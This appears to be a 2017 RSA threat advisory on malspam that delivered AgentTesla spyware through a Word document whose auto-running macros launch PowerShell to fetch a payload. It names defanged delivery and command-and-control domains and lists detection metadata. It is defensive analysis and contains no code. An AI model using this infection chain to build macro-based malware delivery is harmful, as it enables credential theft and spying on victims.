During the first week of July 2017, malspam activity was observed delivering AgentTesla malware, a spyware capable of key and clipboard logging, screen capture, and stealing passwords from browsers [1][2]. This threat advisory will discuss its delivery methods and traffic analysis using NetWitness Logs and Packets.
The observed delivery document (File name: document.doc) was originally uploaded to Virus Total on July 7th and is named “document.doc”. This MS Word document contains embedded and obfuscated macros recorded in VBA, which are auto-launched upon opening. This document when submitted to RSA’s pre-release What's This File service had maximum threat score.
As indicated below, the cleansed VBA code contained within the document uses Document_Open to auto-launch of script and then Shell to launch an executable.
Following the process tree, powershell.exe is called to download “filenew.exe” from findmylogs[.]com and save the payload, a malicious executable saved as “prcQE.exe” in the “\AppData\Local\Temp” folder.
NetWitness packet inspection flags the following meta data from this activity.
An RSA NetWitness Endpoint (aka ECAT) agent installed on the affected client machine shows the following tracking information and machine Indicators of Compromise (IOCs).
After the victim is infected, AgentTesla begins outbound communications via HTTP POSTs to onlinesypoi[.]com. Highlighted fields below represent a possible signature for Agent Tesla spyware [3].
The domain onlinesypoi[.]com itself was also observed delivering AgentTesla binaries.
Scan results for those binaries can be found here and here.
All the IOC from those HTTP sessions were added to RSA FirstWatch Command and Control Domains on Live with the following meta:
- threat.source = ‘rsa-firstwatch’
- threat.category = ‘malspam’
- threat.description = ‘delivery-domain’
Thanks to Kevin Stear and Prakhar Pandey for contributing to this threat advisory.
References: